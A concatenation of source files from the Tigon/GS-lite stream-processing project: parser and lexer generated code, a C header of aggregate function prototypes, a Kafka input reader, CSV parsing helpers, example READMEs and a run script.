YY_STACK_PRINT (yyss, yyssp);
}
YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
*++yyvsp = yylval;
YY_IGNORE_MAYBE_UNINITIALIZED_END
/* Shift the error token. */
YY_SYMBOL_PRINT ("Shifting", yystos[yyn], yyvsp, yylsp);
yystate = yyn;
goto yynewstate;
/*-------------------------------------.
| yyacceptlab -- YYACCEPT comes here. |
`-------------------------------------*/
yyacceptlab:
yyresult = 0;
goto yyreturn;
/*-----------------------------------.
| yyabortlab -- YYABORT comes here. |
`-----------------------------------*/
yyabortlab:
yyresult = 1;
goto yyreturn;
#if !defined yyoverflow || YYERROR_VERBOSE
/*-------------------------------------------------.
| yyexhaustedlab -- memory exhaustion comes here. |
`-------------------------------------------------*/
yyexhaustedlab:
yyerror (YY_("memory exhausted"));
yyresult = 2;
/* Fall through. */
#endif
yyreturn:
if (yychar != YYEMPTY)
{
/* Make sure we have latest lookahead translation. See comments at
user semantic actions for why this is necessary. */
yytoken = YYTRANSLATE (yychar);
yydestruct ("Cleanup: discarding lookahead",
yytoken, &yylval);
}
/* Do not reclaim the symbols of the rule whose action triggered
this YYABORT or YYACCEPT. */
YYPOPSTACK (yylen);
YY_STACK_PRINT (yyss, yyssp);
while (yyssp != yyss)
{
yydestruct ("Cleanup: popping",
yystos[*yyssp], yyvsp);
YYPOPSTACK (1);
}
#ifndef yyoverflow
if (yyss != yyssa)
YYSTACK_FREE (yyss);
#endif
#if YYERROR_VERBOSE
if (yymsg != yymsgbuf)
YYSTACK_FREE (yymsg);
#endif
return yyresult;
}
#line 674 "fta.y" /* yacc.c:1906 */
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef _RTS_UDAF_H_INCLUDED_
#define _RTS_UDAF_H_INCLUDED_
#ifdef __cplusplus
extern "C" {
#endif
#include "gsconfig.h"
#include "gstypes.h"
#include "rts_external.h"
// avg_udaf
void avg_udaf_lfta_LFTA_AGGR_INIT_(gs_sp_t);
void avg_udaf_lfta_LFTA_AGGR_UPDATE_(gs_sp_t,gs_uint32_t);
gs_retval_t avg_udaf_lfta_LFTA_AGBGR_FLUSHME_(gs_sp_t);
void avg_udaf_lfta_LFTA_AGGR_OUTPUT_(struct gs_string *,gs_sp_t);
void avg_udaf_lfta_LFTA_AGGR_DESTROY_(gs_sp_t);
// moving sum
void moving_sum_lfta_LFTA_AGGR_INIT_(gs_sp_t b);
void moving_sum_lfta_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v, gs_uint32_t N);
gs_retval_t moving_sum_lfta_LFTA_AGGR_FLUSHME_(gs_sp_t b);
void moving_sum_lfta_LFTA_AGGR_OUTPUT_(gs_uint64_t *r, gs_sp_t b);
gs_retval_t moving_sum_lfta_LFTA_AGGR_DESTROY_(gs_sp_t b);
// first aggregate
void FIRST_lfta_LFTA_AGGR_INIT_(gs_uint32_t* scratch);
void FIRST_lfta_LFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val);
gs_retval_t FIRST_lfta_LFTA_AGGR_FLUSHME_(gs_uint32_t* scratch);
void FIRST_lfta_LFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch);
void FIRST_lfta_LFTA_AGGR_DESTROY_(gs_uint32_t* scratch);
void FIRST_INT_lfta_LFTA_AGGR_INIT_(gs_int32_t* scratch);
void FIRST_INT_lfta_LFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val);
gs_retval_t FIRST_INT_lfta_LFTA_AGGR_FLUSHME_(gs_int32_t* scratch);
void FIRST_INT_lfta_LFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch);
void FIRST_INT_lfta_LFTA_AGGR_DESTROY_(gs_int32_t* scratch);
void FIRST_ULL_lfta_LFTA_AGGR_INIT_(gs_uint64_t* scratch);
void FIRST_ULL_lfta_LFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val);
gs_retval_t FIRST_ULL_lfta_LFTA_AGGR_FLUSHME_(gs_uint64_t* scratch);
void FIRST_ULL_lfta_LFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch);
void FIRST_ULL_lfta_LFTA_AGGR_DESTROY_(gs_uint64_t* scratch);
void FIRST_LL_lfta_LFTA_AGGR_INIT_(gs_int64_t* scratch);
void FIRST_LL_lfta_LFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val);
gs_retval_t FIRST_LL_lfta_LFTA_AGGR_FLUSHME_(gs_int64_t* scratch);
void FIRST_LL_lfta_LFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch);
void FIRST_LL_lfta_LFTA_AGGR_DESTROY_(gs_int64_t* scratch);
void FIRST_STR_lfta_LFTA_AGGR_INIT_(struct gs_string* scratch);
void FIRST_STR_lfta_LFTA_AGGR_UPDATE_(struct gs_string* scratch, struct gs_string* val);
gs_retval_t FIRST_STR_lfta_LFTA_AGGR_FLUSHME_(struct gs_string* scratch);
void FIRST_STR_lfta_LFTA_AGGR_OUTPUT_(struct gs_string* res, struct gs_string* scratch);
void FIRST_STR_lfta_LFTA_AGGR_DESTROY_(struct gs_string* scratch);
// last aggregate
void LAST_lfta_LFTA_AGGR_INIT_(gs_uint32_t* scratch);
void LAST_lfta_LFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val);
gs_retval_t LAST_lfta_LFTA_AGGR_FLUSHME_(gs_uint32_t* scratch);
void LAST_lfta_LFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch);
void LAST_lfta_LFTA_AGGR_DESTROY_(gs_uint32_t* scratch);
void LAST_INT_lfta_LFTA_AGGR_INIT_(gs_int32_t* scratch);
void LAST_INT_lfta_LFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val);
gs_retval_t LAST_INT_lfta_LFTA_AGGR_FLUSHME_(gs_int32_t* scratch);
void LAST_INT_lfta_LFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch);
void LAST_INT_lfta_LFTA_AGGR_DESTROY_(gs_int32_t* scratch);
void LAST_ULL_lfta_LFTA_AGGR_INIT_(gs_uint64_t* scratch);
void LAST_ULL_lfta_LFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val);
gs_retval_t LAST_ULL_lfta_LFTA_AGGR_FLUSHME_(gs_uint64_t* scratch);
void LAST_ULL_lfta_LFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch);
void LAST_ULL_lfta_LFTA_AGGR_DESTROY_(gs_uint64_t* scratch);
void LAST_LL_lfta_LFTA_AGGR_INIT_(gs_int64_t* scratch);
void LAST_LL_lfta_LFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val);
gs_retval_t LAST_LL_lfta_LFTA_AGGR_FLUSHME_(gs_int64_t* scratch);
void LAST_LL_lfta_LFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch);
void LAST_LL_lfta_LFTA_AGGR_DESTROY_(gs_int64_t* scratch);
void LAST_STR_lfta_LFTA_AGGR_INIT_(struct gs_string* scratch);
void LAST_STR_lfta_LFTA_AGGR_UPDATE_(struct gs_string* scratch, struct gs_string* val);
gs_retval_t LAST_STR_lfta_LFTA_AGGR_FLUSHME_(struct gs_string* scratch);
void LAST_STR_lfta_LFTA_AGGR_OUTPUT_(struct gs_string* res, struct gs_string* scratch);
void LAST_STR_lfta_LFTA_AGGR_DESTROY_(struct gs_string* scratch);
// count_diff aggregate
void count_diff_lfta_ui_LFTA_AGGR_INIT_(gs_sp_t s) ;
void count_diff_lfta_ui_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t val) ;
void count_diff_lfta_ui_LFTA_AGGR_OUTPUT_(struct gs_string *res, gs_sp_t s) ;
void count_diff_lfta_ui_LFTA_AGGR_DESTROY_(gs_sp_t s) ;
gs_retval_t count_diff_lfta_ui_LFTA_AGGR_FLUSHME_(gs_sp_t s) ;
void count_diff_lfta_i_LFTA_AGGR_INIT_(gs_sp_t s) ;
void count_diff_lfta_i_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t val) ;
void count_diff_lfta_i_LFTA_AGGR_OUTPUT_(struct gs_string *res, gs_sp_t s) ;
void count_diff_lfta_i_LFTA_AGGR_DESTROY_(gs_sp_t s) ;
gs_retval_t count_diff_lfta_i_LFTA_AGGR_FLUSHME_(gs_sp_t s) ;
void count_diff_lfta_ul_LFTA_AGGR_INIT_(gs_sp_t s) ;
void count_diff_lfta_ul_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t val) ;
void count_diff_lfta_ul_LFTA_AGGR_OUTPUT_(struct gs_string *res, gs_sp_t s) ;
void count_diff_lfta_ul_LFTA_AGGR_DESTROY_(gs_sp_t s) ;
gs_retval_t count_diff_lfta_ul_LFTA_AGGR_FLUSHME_(gs_sp_t s) ;
void count_diff_lfta_l_LFTA_AGGR_INIT_(gs_sp_t s) ;
void count_diff_lfta_l_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t val) ;
void count_diff_lfta_l_LFTA_AGGR_OUTPUT_(struct gs_string *res, gs_sp_t s) ;
void count_diff_lfta_l_LFTA_AGGR_DESTROY_(gs_sp_t s) ;
gs_retval_t count_diff_lfta_l_LFTA_AGGR_FLUSHME_(gs_sp_t s) ;
void count_diff_lfta_s_LFTA_AGGR_INIT_(gs_sp_t s) ;
void count_diff_lfta_s_LFTA_AGGR_UPDATE_(gs_sp_t s, struct gs_string *val) ;
void count_diff_lfta_s_LFTA_AGGR_OUTPUT_(struct gs_string *res, gs_sp_t s) ;
void count_diff_lfta_s_LFTA_AGGR_DESTROY_(gs_sp_t s) ;
gs_retval_t count_diff_lfta_s_LFTA_AGGR_FLUSHME_(gs_sp_t s) ;
// running_array_aggr aggregate
void running_array_aggr_lfta_LFTA_AGGR_INIT_(char* scratch);
void running_array_aggr_lfta_LFTA_AGGR_UPDATE_(char* scratch, gs_uint32_t val);
gs_retval_t running_array_aggr_lfta_LFTA_AGGR_FLUSHME_(char* scratch);
void running_array_aggr_lfta_LFTA_AGGR_OUTPUT_(struct gs_string* res, char* scratch);
void running_array_aggr_lfta_LFTA_AGGR_DESTROY_(char* scratch);
//////////////////////////////////////////////////////////////////
/// Flip-s sample-based quantiles
/****************************************************************/
/* LFTA functions */
/****************************************************************/
void quant_ui_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t);
void quant_ui_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t, gs_uint32_t);
gs_retval_t quant_ui_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t);
void quant_ui_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *, gs_sp_t);
void quant_ui_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t);
void quant_i_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t);
void quant_i_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t, gs_int32_t);
gs_retval_t quant_i_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t);
void quant_i_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *, gs_sp_t);
void quant_i_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t);
void quant_ul_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t);
void quant_ul_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t, gs_uint64_t);
gs_retval_t quant_ul_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t);
void quant_ul_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *, gs_sp_t);
void quant_ul_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t);
void quant_l_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t);
void quant_l_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t, gs_int64_t);
gs_retval_t quant_l_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t);
void quant_l_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *, gs_sp_t);
void quant_l_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t);
void quant_f_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t);
void quant_f_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t, gs_float_t);
gs_retval_t quant_f_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t);
void quant_f_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *, gs_sp_t);
void quant_f_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t);
/////////////////////////////////////////////////////////
// ==============================================================
// other rts functions.
// sum up unsigned integers expressed as a string with separators,
// e.g. on input '34|45|56' and sep '|', return 135.
// This kind of thing is common in Nokia PCMD data.
// gracefully handle empty entries, e.g. '|8|' should return 8
gs_int64_t sum_uint_in_list(struct gs_string *list, struct gs_string *sepchar);
// Convert a string to a llong.
// Has some protection to reject non-numeric characters.
// a leading minus sign is allowed
gs_int64_t to_llong(struct gs_string *v);
#ifdef __cplusplus
}
#endif
#endif
<file_sep>This example demonstrates a query system reading from a file stream.
gen_feed.py creates the file stream by replacing its contents
every second, checking first if the GS-lite instance has finished
processing the file.
Additional features demonstrated:
- a reference to an interface set in example.gsql
- a reference to a library query in example2.gsql
- the output_spec.cfg has query example putting output on a stream,
while example2 periodically dumps output in files in directory output_dir
- The files in output_dir are in gdat format. Use gs-lite/bin/gdat2ascii
to extract their contents to ascii
- the runall script starts up query system, note the use of gsprintconsole
for both example and example2
- the killall script ensures that gsprintconsole and gen_feed.py instances
are stopped.
<file_sep>#!/bin/sh
./killexample
sleep 1
./runit
python ./gen_feed.py &
sleep 10
../../bin/gsprintconsole `cat gshub.log` default example &
../../bin/gsprintconsole `cat gshub.log` default example2 &
sleep 1
../../bin/start_processing
<file_sep># Tigon

**Introduction**
**Tigon** is an open-source, real-time, low-latency, high-throughput stream processing framework.
Tigon is a collaborative effort between Cask Data, Inc. and AT&T that combines
technologies from these companies to create a disruptive new framework to handle a diverse
set of real-time streaming requirements.
Cask Data has built technology that provides scalable, reliable, and persistent high-throughput
event processing with high-level Java APIs using Hadoop and HBase.
AT&T has built a streaming engine that provides massively scalable, flexible, and in-memory
low-latency stream processing with a SQL-like query Language.
Together, they have combined to create **Tigon**.
## Getting Started
### Prerequisites
Tigon is supported on *NIX systems such as Linux and Macintosh OS X.
It is not supported on Microsoft Windows.
## License and Trademarks
Copyright © 2014 Cask Data, Inc.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the
License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied. See the License for the specific language governing permissions
and limitations under the License.
Cask is a trademark of Cask Data, Inc. All rights reserved.
Apache, Apache HBase, and HBase are trademarks of The Apache Software Foundation. Used with
permission. No endorsement by The Apache Software Foundation is implied by the use of these marks.
<file_sep>This example demonstrates a query system reading from a single file.
The input data file is csvsingle.dat, and it remains after processing.
Additional features demonstrated:
- a reference to a specific interface
- The output is redirected into example1.csv and example2.csv
- THe last line is an end-of-data marker.
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <zlib.h>
#include "errno.h"
#include "stdio.h"
#include "stdlib.h"
#include "gsconfig.h"
#include "gshub.h"
#include "gstypes.h"
#include "lapp.h"
#include "fta.h"
#include "packet.h"
#include "schemaparser.h"
#include "lfta/rts.h"
void fta_init(gs_sp_t device);
void rts_fta_process_packet(struct packet * p);
void rts_fta_done();
#ifdef KAFKA_ENABLED
#include <librdkafka/rdkafka.h>
time_t st_time;
gs_uint32_t max_field_kafka = CSVELEMENTS;
#define KAFKA_TIMEOUT 1000 // timeout value for getting next batach of records (in ms)
gs_sp_t dev;
static int fd=-1;
static struct packet cur_packet;
static gs_sp_t config_fname;
static gs_sp_t topics_fname;
static gs_sp_t line;
static ssize_t len;
static size_t line_len;
static gs_uint32_t lineend=0;
static gs_uint8_t csvdel = ',';
static gs_uint32_t verbose=0;
static gs_uint32_t startupdelay=0;
#define MAX_KAFKA_TOPICS 256
static rd_kafka_t *rk;
static rd_kafka_conf_t *conf;
static rd_kafka_queue_t *rkqu = NULL;
static rd_kafka_topic_t *topic_list[MAX_KAFKA_TOPICS];
gs_uint32_t num_topics;
#include "lfta/csv_parser.h"
static int read_topic_list (rd_kafka_t * rk, rd_kafka_queue_t *kqueue, rd_kafka_topic_t **topic_list, int max_topics, const char *fname) {
FILE *fp;
int line = 0;
char buf[512];
if (!(fp = fopen(fname, "r"))) {
fprintf(stderr, "Unable to open kafka topic list file %s\n", fname);
return -1;
}
while (line < max_topics && fgets(buf, sizeof(buf), fp)) {
strtok(buf, " \t\r\n"); // truncate the whitespace and end of line
topic_list[line] = rd_kafka_topic_new(rk, buf, NULL);
int r = rd_kafka_consume_start_queue(topic_list[line], 0, RD_KAFKA_OFFSET_END, kqueue);
if (r == -1) {
fprintf(stderr, "Unable to add topic %s to queue: %s\n", buf, rd_kafka_err2str(rd_kafka_last_error()));
exit(1);
}
line++;
}
fclose(fp);
return line;
}
static int read_conf_file (rd_kafka_conf_t *conf, const char *fname) {
FILE *fp;
int line = 0;
char buf[10240];
char errstr[512];
if (!(fp = fopen(fname, "r"))) {
fprintf(stderr, "Unable to open kafka configuration file %s\n", fname);
return -1;
}
while (fgets(buf, sizeof(buf), fp)) {
char *s = buf;
char *t;
rd_kafka_conf_res_t r = RD_KAFKA_CONF_UNKNOWN;
line++;
while (isspace((int)*s))
s++;
if (!*s || *s == '#')
continue;
if ((t = strchr(buf, '\n')))
*t = '\0';
t = strchr(buf, '=');
if (!t || t == s || !*(t+1)) {
fprintf(stderr, "Error reading kafka config file %s:%d: expected key=value\n", fname, line);
fclose(fp);
return -1;
}
*(t++) = '\0';
// set config property
r = rd_kafka_conf_set(conf, s, t, errstr, sizeof(errstr));
if (r == RD_KAFKA_CONF_OK)
continue;
fprintf(stderr, "Unable set to set kafka configuration property %s:%d: %s=%s: %s\n", fname, line, s, t, errstr);
fclose(fp);
return -1;
}
fclose(fp);
return 0;
}
static void msg_consume (rd_kafka_message_t *rkmessage, void *opaque) {
if (rkmessage->err) {
if (rkmessage->err == RD_KAFKA_RESP_ERR__PARTITION_EOF) {
// caught up with the data
return;
}
return;
}
csv_parse_line(rkmessage->payload, rkmessage->len);
rts_fta_process_packet(&cur_packet);
}
static gs_retval_t kafka_replay_init(gs_sp_t device)
{
gs_sp_t verbosetmp;
gs_sp_t delaytmp;
gs_sp_t tempdel;
gs_sp_t maxfieldtmp;
if ((verbosetmp=get_iface_properties(device,(gs_sp_t)"verbose"))!=0) {
if (strncmp(verbosetmp,"TRUE",4)==0) {
verbose=1;
fprintf(stderr,"VERBOSE ENABLED\n");
} else {
fprintf(stderr,"VERBOSE DISABLED\n");
}
}
if ((config_fname=get_iface_properties(device,(gs_sp_t)"kafkaconfig"))==0) {
print_error((gs_sp_t)"kafka_replay_init::No \"kafkaconfig\" defined");
exit(0);
}
if ((topics_fname=get_iface_properties(device,(gs_sp_t)"kafkatopics"))==0) {
print_error((gs_sp_t)"kafka_replay_init::No \"kafkatopics\" defined");
exit(0);
}
tempdel=get_iface_properties(device,(gs_sp_t)"csvseparator");
if (tempdel != 0 ) {
csvdel = tempdel[0];
csv_set_delim(csvdel);
}
if ((delaytmp=get_iface_properties(device,(gs_sp_t)"startupdelay"))!=0) {
if (verbose) {
fprintf(stderr,"Startup delay of %u seconds\n",atoi(delaytmp));
}
startupdelay=atoi(delaytmp);
}
if ((maxfieldtmp=get_iface_properties(device,(gs_sp_t)"_max_csv_pos"))!=0) {
max_field_kafka=atoi(maxfieldtmp);
}
// set maximum field nubmer to be extracted by csv parser
csv_set_maxfield(max_field_kafka);
cur_packet.ptype=PTYPE_CSV;
char errstr[512];
// load Kafka configuration from config file
conf = rd_kafka_conf_new();
read_conf_file(conf, config_fname);
// create new Kafka handle using configuration settings
if (!(rk = rd_kafka_new(RD_KAFKA_CONSUMER, conf, errstr, sizeof(errstr)))) {
fprintf(stderr, "Unable to create new Kafka consumer: %s\n", errstr);
exit(1);
}
// load topic list fromt he file and setup a kafka queue to consume them
rkqu = rd_kafka_queue_new(rk);
num_topics = read_topic_list(rk, rkqu, topic_list, MAX_KAFKA_TOPICS, topics_fname);
if (!num_topics) {
fprintf(stderr, "Empty list of Kafka topics\n");
}
return 0;
}
static gs_retval_t kafka_process_input()
{
unsigned cnt = 0;
static unsigned totalcnt = 0;
gs_int32_t retval;
while(cnt < 50000) { // process up to 50000 tuples at a time
retval = rd_kafka_consume_callback_queue(rkqu, KAFKA_TIMEOUT, msg_consume, NULL);
if (retval == 0) return 0; // got a timeout so service message queue
if (retval < 0) {
// tear down kafka
size_t i = 0;
// stop consuming from topics
for (i=0 ; i<num_topics ; ++i) {
int r = rd_kafka_consume_stop(topic_list[i], 0);
if (r == -1) {
fprintf(stderr, "Enable to stop consuming from topic %s\n", rd_kafka_err2str(rd_kafka_last_error()));
}
}
// destoy queue
rd_kafka_queue_destroy(rkqu);
// Destroy topics
for (i=0 ; i<num_topics ; ++i) {
rd_kafka_topic_destroy(topic_list[i]);
}
// destroy Kafka handle
rd_kafka_destroy(rk);
// we signal that everything is done
if (verbose)
fprintf(stderr,"Done processing, waiting for things to shut down\n");
rts_fta_done();
// now just service message queue until we get killed or loose connectivity
while (1) {
fta_start_service(0); // service all waiting messages
usleep(1000); // sleep a millisecond
}
}
cnt += retval;
}
totalcnt = totalcnt + cnt;
if (verbose) {
fprintf(stderr,"Processed %u tuples, rate = %lf tup/sec\n", totalcnt, (double)totalcnt / (double)(time(NULL) - st_time));
}
return 0;
}
gs_retval_t main_kafka(gs_int32_t devicenum, gs_sp_t device, gs_int32_t mapcnt, gs_sp_t map[]) {
gs_uint32_t cont;
endpoint mygshub;
dev = device;
kafka_replay_init(device);
/* initalize host_lib */
if (verbose) {
fprintf(stderr,"Init LFTAs for %s\n",device);
}
if (hostlib_init(LFTA,0,devicenum,mapcnt,map) < 0) {
fprintf(stderr,"%s::error:could not initiate host lib for clearinghouse\n",
device);
exit(7);
}
fta_init(device); /*xxx probably should get error code back put Ted doesn't give me one*/
// set maximum field nubmer to be extracted by csv parser
csv_set_maxfield(max_field_kafka);
cont = startupdelay + time(0);
if (verbose) { fprintf(stderr,"Start startup delay"); }
while (cont > time(NULL)) {
if (fta_start_service(0) < 0) {
fprintf(stderr,"%s::error:in processing the msg queue\n", device);
exit(9);
}
usleep(1000); /* sleep for one millisecond */
}
if (verbose) { fprintf(stderr,"... Done\n"); }
// wait to process till we get the signal from GSHUB
if (get_hub(&mygshub) != 0) {
print_error((gs_sp_t)"ERROR:could not find gshub for data source");
exit(0);
}
while(get_startprocessing(mygshub,get_instance_name(),0) != 0) {
usleep(100);
if (fta_start_service(0) < 0) {
fprintf(stderr,"%s::error:in processing the msg queue\n", device);
exit(9);
}
}
/* now we enter an endless loop to process data */
if (verbose) {
fprintf(stderr,"Start processing %s\n",device);
}
st_time = time(NULL);
while (1) {
if (kafka_process_input() < 0) {
fprintf(stderr,"%s::error:in processing records\n", device);
exit(8);
}
/* process all messages on the message queue*/
if (fta_start_service(0) < 0) {
fprintf(stderr,"%s::error:in processing the msg queue\n", device);
exit(9);
}
}
return 0;
}
#else
// This is a stub entry point to ensure proper linking when Kafka support is not enabled
gs_retval_t main_kafka(gs_int32_t devicenum, gs_sp_t device, gs_int32_t mapcnt, gs_sp_t map[]) {
fprintf(stderr,"ERROR: runtime built without Kafka support.\n");
exit(1);
return 0;
}
#endif // KAFKA_ENABLED
<file_sep>#ifndef __WATCHLIST_H_DEFINED__
#define __WATCHLIST_H_DEFINED__
static inline gs_retval_t wl_csv_uint(char *p, gs_uint32_t *t)
{
*t = strtoul((const char*)p, NULL, 10);
return 0;
}
static inline gs_retval_t wl_csv_ullong(char *p, gs_uint64_t *t)
{
*t = strtoull((const char*)p, NULL, 10);
return 0;
}
static inline gs_retval_t wl_csv_ip(char *p, gs_uint32_t *t)
{
unsigned ip1,ip2,ip3,ip4;
sscanf((const char*) p,"%u.%u.%u.%u",&ip1,&ip2,&ip3,&ip4);
*t=(ip1<<24)|(ip2<<16)|(ip3<<8)|ip4;
return 0;
}
static inline gs_retval_t wl_csv_ipv6(char *p, struct ipv6_str *t)
{
gs_uint32_t v[8];
sscanf((const char*) p,"%x:%x:%x:%x:%x:%x:%x:%x",&v[0],&v[1],&v[2],&v[3],&v[4],&v[5],&v[6],&v[7]);
t->v[0]=htonl(v[0]<<16|v[1]);
t->v[1]=htonl(v[2]<<16|v[3]);
t->v[2]=htonl(v[4]<<16|v[5]);
t->v[3]=htonl(v[6]<<16|v[7]);
return 0;
}
static inline gs_retval_t wl_csv_string(char *p, struct gs_string * t)
{
size_t sz = strlen(p);
t->data=(gs_sp_t)strndup(p, sz);
t->length=sz;
t->owner=(struct FTA *)1;
return 0;
}
static inline gs_retval_t wl_csv_bool(char *p, gs_uint32_t *t)
{
*t=0;
if ((strlen((const char*)p)==4) &&
(strncasecmp("TRUE",(const char*)p,4) ==0) ) {
*t=1;
}
return 0;
}
static inline gs_retval_t wl_csv_int(char *p, gs_int32_t *t)
{
*t = strtol((const char*)p, NULL, 10);
return 0;
}
static inline gs_retval_t wl_csv_llong(char *p, gs_int64_t *t)
{
*t = strtoll((const char*)p, NULL, 10);
return 0;
}
static inline gs_retval_t wl_csv_float(char *p, gs_float_t *t)
{
*t = strtod((const char*)p, NULL);
return 0;
}
#endif
<file_sep>This example demonstrates a query system reading from a file stream.
gen_feed.py creates the file stream by replacing its contents
every second, checking first if the GS-lite instance has finished
processing the file.
The source file is in gdat format, use
../../bin/gdat2ascii example.gdat to see its contents
Additional features demonstrated:
- a reference to an interface set in example.gsql
- the runall script starts up query system, note the use of gsprintconsole
to start processing
- the killall script ensures that gsprintconsole and gen_feed.py instances
are stopped.
<file_sep>#line 2 "ftalexer.cc"
#line 4 "ftalexer.cc"
#define YY_INT_ALIGNED short int
/* A lexical scanner generated by flex */
#define yy_create_buffer FtaParser_create_buffer
#define yy_delete_buffer FtaParser_delete_buffer
#define yy_flex_debug FtaParser_flex_debug
#define yy_init_buffer FtaParser_init_buffer
#define yy_flush_buffer FtaParser_flush_buffer
#define yy_load_buffer_state FtaParser_load_buffer_state
#define yy_switch_to_buffer FtaParser_switch_to_buffer
#define yyin FtaParserin
#define yyleng FtaParserleng
#define yylex FtaParserlex
#define yylineno FtaParserlineno
#define yyout FtaParserout
#define yyrestart FtaParserrestart
#define yytext FtaParsertext
#define yywrap FtaParserwrap
#define yyalloc FtaParseralloc
#define yyrealloc FtaParserrealloc
#define yyfree FtaParserfree
#define FLEX_SCANNER
#define YY_FLEX_MAJOR_VERSION 2
#define YY_FLEX_MINOR_VERSION 6
#define YY_FLEX_SUBMINOR_VERSION 0
#if YY_FLEX_SUBMINOR_VERSION > 0
#define FLEX_BETA
#endif
/* First, we deal with platform-specific or compiler-specific issues. */
/* begin standard C headers. */
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
/* end standard C headers. */
/* flex integer type definitions */
#ifndef FLEXINT_H
#define FLEXINT_H
/* C99 systems have <inttypes.h>. Non-C99 systems may or may not. */
#if defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L
/* C99 says to define __STDC_LIMIT_MACROS before including stdint.h,
* if you want the limit (max/min) macros for int types.
*/
#ifndef __STDC_LIMIT_MACROS
#define __STDC_LIMIT_MACROS 1
#endif
#include <inttypes.h>
typedef int8_t flex_int8_t;
typedef uint8_t flex_uint8_t;
typedef int16_t flex_int16_t;
typedef uint16_t flex_uint16_t;
typedef int32_t flex_int32_t;
typedef uint32_t flex_uint32_t;
#else
typedef signed char flex_int8_t;
typedef short int flex_int16_t;
typedef int flex_int32_t;
typedef unsigned char flex_uint8_t;
typedef unsigned short int flex_uint16_t;
typedef unsigned int flex_uint32_t;
/* Limits of integral types. */
#ifndef INT8_MIN
#define INT8_MIN (-128)
#endif
#ifndef INT16_MIN
#define INT16_MIN (-32767-1)
#endif
#ifndef INT32_MIN
#define INT32_MIN (-2147483647-1)
#endif
#ifndef INT8_MAX
#define INT8_MAX (127)
#endif
#ifndef INT16_MAX
#define INT16_MAX (32767)
#endif
#ifndef INT32_MAX
#define INT32_MAX (2147483647)
#endif
#ifndef UINT8_MAX
#define UINT8_MAX (255U)
#endif
#ifndef UINT16_MAX
#define UINT16_MAX (65535U)
#endif
#ifndef UINT32_MAX
#define UINT32_MAX (4294967295U)
#endif
